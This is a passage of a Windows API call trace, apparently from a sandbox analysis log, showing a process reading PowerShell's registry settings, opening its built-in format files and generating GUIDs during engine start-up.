	[0763.471] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.471] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.471] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.472] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.472] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.472] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.473] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.473] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.473] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0xe67, lpOverlapped=0x0) returned 1
	[0763.473] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79297, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79297*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.474] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.474] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0763.474] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0763.474] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0763.474] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0763.474] CoTaskMemFree (pv=0x1b8e2060) 
	[0763.474] RegCloseKey (hKey=0x2f0) returned 0x0
	[0763.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0763.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0763.476] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6f128bc9, Data2=0x7138, Data3=0x49df, Data4=([0]=0xbd, [1]=0x66, [2]=0x4e, [3]=0xf, [4]=0xf5, [5]=0xfe, [6]=0xb, [7]=0x6))) returned 0x0
	[0763.477] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x99f7fb68, Data2=0x4146, Data3=0x4f8e, Data4=([0]=0xad, [1]=0x5, [2]=0x61, [3]=0x5, [4]=0xc3, [5]=0xe3, [6]=0xc8, [7]=0x24))) returned 0x0
	[0763.477] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x4cc41525, Data2=0x939f, Data3=0x405b, Data4=([0]=0xa6, [1]=0x3e, [2]=0x80, [3]=0xcb, [4]=0x45, [5]=0x7c, [6]=0x6b, [7]=0xd6))) returned 0x0
	[0763.477] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x4571c8e3, Data2=0x3f9a, Data3=0x4053, Data4=([0]=0xbe, [1]=0xd3, [2]=0x6b, [3]=0x8b, [4]=0x8b, [5]=0x4e, [6]=0xe, [7]=0x9b))) returned 0x0
	[0763.477] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xcaf64f87, Data2=0x1843, Data3=0x4b8c, Data4=([0]=0x8f, [1]=0x3c, [2]=0xdb, [3]=0x84, [4]=0xf0, [5]=0xb0, [6]=0xe, [7]=0xf6))) returned 0x0
	[0763.477] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe2105d3b, Data2=0x15e0, Data3=0x4d61, Data4=([0]=0x98, [1]=0xf3, [2]=0xf0, [3]=0xf, [4]=0x26, [5]=0xfb, [6]=0x79, [7]=0xb5))) returned 0x0
	[0763.478] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe4a6fa84, Data2=0xbe67, Data3=0x41d1, Data4=([0]=0xaa, [1]=0x25, [2]=0x10, [3]=0xd0, [4]=0x88, [5]=0xcd, [6]=0x76, [7]=0x30))) returned 0x0
	[0763.478] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf15e2559, Data2=0x80ef, Data3=0x42d6, Data4=([0]=0xa0, [1]=0x46, [2]=0xa5, [3]=0x57, [4]=0x9, [5]=0x4e, [6]=0xa1, [7]=0x47))) returned 0x0
	[0763.478] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x19a12ad, Data2=0x2ca7, Data3=0x45d8, Data4=([0]=0x9d, [1]=0x55, [2]=0x20, [3]=0x7b, [4]=0x3, [5]=0x6b, [6]=0x8b, [7]=0x2c))) returned 0x0
	[0763.478] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x70e8ddd2, Data2=0xc944, Data3=0x4979, Data4=([0]=0xa8, [1]=0x1e, [2]=0x6, [3]=0x22, [4]=0xdf, [5]=0xbc, [6]=0xd6, [7]=0xf2))) returned 0x0
	[0763.478] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x22e38e82, Data2=0xa3de, Data3=0x497e, Data4=([0]=0x92, [1]=0xbf, [2]=0xf3, [3]=0xf9, [4]=0x8a, [5]=0x43, [6]=0xb6, [7]=0xa2))) returned 0x0
	[0763.479] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x345eabf8, Data2=0x33b8, Data3=0x4585, Data4=([0]=0xb0, [1]=0xe7, [2]=0x18, [3]=0xce, [4]=0xba, [5]=0x64, [6]=0xed, [7]=0xea))) returned 0x0
	[0763.479] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe0e2824c, Data2=0x9e90, Data3=0x4ff0, Data4=([0]=0xba, [1]=0x12, [2]=0x6e, [3]=0x96, [4]=0xb6, [5]=0x13, [6]=0xc, [7]=0xb4))) returned 0x0
	[0763.479] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xcb699ba7, Data2=0x51f7, Data3=0x4d09, Data4=([0]=0x8b, [1]=0x42, [2]=0x75, [3]=0x53, [4]=0xf3, [5]=0x22, [6]=0x10, [7]=0x6b))) returned 0x0
	[0763.479] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe85d80b6, Data2=0x9ae8, Data3=0x413b, Data4=([0]=0xbd, [1]=0x39, [2]=0xcb, [3]=0x75, [4]=0x67, [5]=0xfd, [6]=0xc0, [7]=0xd4))) returned 0x0
	[0763.479] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6b1d7bf3, Data2=0x1a71, Data3=0x4400, Data4=([0]=0x8d, [1]=0x39, [2]=0xe, [3]=0x9f, [4]=0x32, [5]=0xaa, [6]=0x1d, [7]=0x65))) returned 0x0
	[0763.480] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x107404db, Data2=0x576c, Data3=0x4162, Data4=([0]=0xa9, [1]=0x87, [2]=0xb9, [3]=0xfd, [4]=0x95, [5]=0x1f, [6]=0xd5, [7]=0x3f))) returned 0x0
	[0763.480] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6325258b, Data2=0xed15, Data3=0x47e9, Data4=([0]=0x9f, [1]=0x25, [2]=0xea, [3]=0x49, [4]=0x38, [5]=0xd4, [6]=0x81, [7]=0x1c))) returned 0x0
	[0763.480] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x8628b654, Data2=0x5f7e, Data3=0x4042, Data4=([0]=0x80, [1]=0x6a, [2]=0xd, [3]=0x5c, [4]=0xb2, [5]=0x7a, [6]=0xc6, [7]=0xe6))) returned 0x0
	[0763.480] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5a67029f, Data2=0xf181, Data3=0x4d86, Data4=([0]=0x9d, [1]=0xb1, [2]=0x12, [3]=0xb1, [4]=0x7e, [5]=0x5b, [6]=0x21, [7]=0x27))) returned 0x0
	[0763.480] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xfa9fb9d7, Data2=0x1856, Data3=0x4028, Data4=([0]=0x89, [1]=0x5e, [2]=0x73, [3]=0x57, [4]=0xd2, [5]=0x40, [6]=0xa7, [7]=0xd4))) returned 0x0
	[0763.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x98f45aa5, Data2=0x2485, Data3=0x43c3, Data4=([0]=0xa1, [1]=0x14, [2]=0x86, [3]=0xfc, [4]=0xed, [5]=0xe, [6]=0xb3, [7]=0x13))) returned 0x0
	[0763.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xab450504, Data2=0x1ca5, Data3=0x4d21, Data4=([0]=0x98, [1]=0x10, [2]=0xb8, [3]=0xe3, [4]=0x35, [5]=0xc0, [6]=0xa7, [7]=0xd9))) returned 0x0
	[0763.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5de78c3d, Data2=0x537d, Data3=0x4b11, Data4=([0]=0xab, [1]=0xdd, [2]=0xc6, [3]=0x83, [4]=0xf1, [5]=0x5e, [6]=0x8c, [7]=0x1a))) returned 0x0
	[0763.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7067823d, Data2=0x60ce, Data3=0x4c08, Data4=([0]=0x84, [1]=0x5, [2]=0xba, [3]=0x7d, [4]=0x22, [5]=0x29, [6]=0x5a, [7]=0xff))) returned 0x0
	[0763.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xcd086b03, Data2=0xb758, Data3=0x4e22, Data4=([0]=0xba, [1]=0x24, [2]=0xc1, [3]=0x87, [4]=0x7b, [5]=0xe1, [6]=0xad, [7]=0x70))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xd73bd2cb, Data2=0xdfef, Data3=0x43c8, Data4=([0]=0xa7, [1]=0x72, [2]=0xfc, [3]=0x67, [4]=0x6, [5]=0xc1, [6]=0x13, [7]=0xe3))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x42703ff9, Data2=0x5aa3, Data3=0x4dd8, Data4=([0]=0x85, [1]=0x54, [2]=0x7d, [3]=0x4f, [4]=0x71, [5]=0x53, [6]=0xb1, [7]=0x39))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc13cc08c, Data2=0x8298, Data3=0x4439, Data4=([0]=0x98, [1]=0x40, [2]=0x44, [3]=0x8e, [4]=0xd5, [5]=0x8f, [6]=0x8b, [7]=0xa4))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x9b109414, Data2=0xd4a1, Data3=0x49ef, Data4=([0]=0xa0, [1]=0x44, [2]=0x65, [3]=0xaf, [4]=0x46, [5]=0xe8, [6]=0xef, [7]=0x31))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6f10a467, Data2=0x1750, Data3=0x4137, Data4=([0]=0x83, [1]=0xc1, [2]=0x5f, [3]=0xc0, [4]=0x64, [5]=0xd6, [6]=0xd0, [7]=0x2a))) returned 0x0
	[0763.482] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x263c1371, Data2=0xce2a, Data3=0x4ef1, Data4=([0]=0x87, [1]=0xd4, [2]=0x28, [3]=0x73, [4]=0x62, [5]=0x23, [6]=0xa8, [7]=0xd))) returned 0x0
	[0763.483] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6135b6e1, Data2=0xdce6, Data3=0x42ff, Data4=([0]=0x90, [1]=0x83, [2]=0x1d, [3]=0xff, [4]=0xa8, [5]=0xc9, [6]=0x16, [7]=0xd2))) returned 0x0
	[0763.489] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf80ce17c, Data2=0x6d9e, Data3=0x42e6, Data4=([0]=0xa4, [1]=0xf2, [2]=0x8a, [3]=0x3b, [4]=0xd5, [5]=0x7a, [6]=0x69, [7]=0x5d))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc5807a91, Data2=0x6b2a, Data3=0x44c7, Data4=([0]=0x9a, [1]=0x6c, [2]=0xde, [3]=0x6b, [4]=0xaf, [5]=0x4f, [6]=0x6, [7]=0xaa))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5d7eb230, Data2=0xba8, Data3=0x4715, Data4=([0]=0xa7, [1]=0x47, [2]=0xe4, [3]=0xc2, [4]=0xae, [5]=0x1d, [6]=0x52, [7]=0x7f))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xabd3cd7b, Data2=0xd80e, Data3=0x4dbe, Data4=([0]=0xa1, [1]=0xb6, [2]=0x79, [3]=0x5d, [4]=0x52, [5]=0x4, [6]=0x38, [7]=0x95))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x8fadc44, Data2=0xd162, Data3=0x4fab, Data4=([0]=0xbc, [1]=0xd8, [2]=0x99, [3]=0x8f, [4]=0xd0, [5]=0x73, [6]=0x89, [7]=0xf5))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc0de2d28, Data2=0x117a, Data3=0x4195, Data4=([0]=0xbe, [1]=0x49, [2]=0x9e, [3]=0x4c, [4]=0x3f, [5]=0xcc, [6]=0xbe, [7]=0x1d))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x9432946d, Data2=0xdc6, Data3=0x4caa, Data4=([0]=0x8f, [1]=0xe6, [2]=0x16, [3]=0x69, [4]=0x7d, [5]=0x65, [6]=0xd3, [7]=0x68))) returned 0x0
	[0763.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x22cdb44b, Data2=0x4761, Data3=0x4019, Data4=([0]=0x85, [1]=0xf9, [2]=0xfd, [3]=0x38, [4]=0xe9, [5]=0x12, [6]=0xfa, [7]=0xa5))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xeda99277, Data2=0xcce0, Data3=0x4d49, Data4=([0]=0x88, [1]=0xa5, [2]=0xfa, [3]=0xbe, [4]=0x72, [5]=0xc, [6]=0x57, [7]=0xb))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x704793a7, Data2=0x5d6c, Data3=0x441d, Data4=([0]=0xbb, [1]=0xb4, [2]=0xf6, [3]=0xca, [4]=0x23, [5]=0xfc, [6]=0x8a, [7]=0x81))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x3342a228, Data2=0xdc5a, Data3=0x41a2, Data4=([0]=0x80, [1]=0x37, [2]=0xd4, [3]=0x63, [4]=0x10, [5]=0x29, [6]=0x57, [7]=0x21))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7a25da50, Data2=0x16dd, Data3=0x4780, Data4=([0]=0xb1, [1]=0x9c, [2]=0xc4, [3]=0x35, [4]=0x78, [5]=0x14, [6]=0x41, [7]=0x34))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf5b13ad0, Data2=0x239c, Data3=0x4e24, Data4=([0]=0x8b, [1]=0xc7, [2]=0x17, [3]=0x4c, [4]=0x96, [5]=0xa3, [6]=0x31, [7]=0x7b))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x29c9de76, Data2=0x3bbd, Data3=0x4721, Data4=([0]=0x9c, [1]=0xd5, [2]=0xfa, [3]=0x4d, [4]=0x42, [5]=0x57, [6]=0xc8, [7]=0x2f))) returned 0x0
	[0763.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7b8fbd13, Data2=0x65a7, Data3=0x4b3e, Data4=([0]=0x9a, [1]=0x94, [2]=0x8e, [3]=0x68, [4]=0x13, [5]=0xb0, [6]=0x98, [7]=0x31))) returned 0x0
	[0763.492] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0763.492] GetFileType (hFile=0x2f0) returned 0x1
	[0763.492] SetErrorMode (uMode=0x1) returned 0x1
	[0763.492] GetFileType (hFile=0x2f0) returned 0x1
	[0763.492] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.492] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.492] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x8b4, lpOverlapped=0x0) returned 1
	[0763.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d707c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d707c*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d7c60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d7c60*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0763.493] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0763.493] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0763.493] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0763.494] CoTaskMemFree (pv=0x1b8e2060) 
	[0763.494] RegCloseKey (hKey=0x2f0) returned 0x0
	[0763.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0763.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0763.494] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc7085f66, Data2=0x710, Data3=0x4962, Data4=([0]=0x8b, [1]=0x55, [2]=0x79, [3]=0x98, [4]=0xbb, [5]=0x57, [6]=0xc3, [7]=0xb1))) returned 0x0
	[0763.495] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x35f07928, Data2=0xd6ed, Data3=0x459b, Data4=([0]=0x97, [1]=0x32, [2]=0x1a, [3]=0xb, [4]=0x11, [5]=0x4b, [6]=0xb9, [7]=0x31))) returned 0x0
	[0763.495] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0763.495] GetFileType (hFile=0x2f0) returned 0x1
	[0763.495] SetErrorMode (uMode=0x1) returned 0x1
	[0763.495] GetFileType (hFile=0x2f0) returned 0x1
	[0763.495] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.495] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.495] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.496] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.496] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0xe98, lpOverlapped=0x0) returned 1
	[0763.496] ReadFile (in: hFile=0x2f0, lpBuffer=0x31173a8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31173a8*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.496] ReadFile (in: hFile=0x2f0, lpBuffer=0x3117da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3117da8*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0763.496] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0763.496] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0763.497] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0763.497] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0763.497] CoTaskMemFree (pv=0x1b8e2060) 
	[0763.497] RegCloseKey (hKey=0x2f0) returned 0x0
	[0763.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0763.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
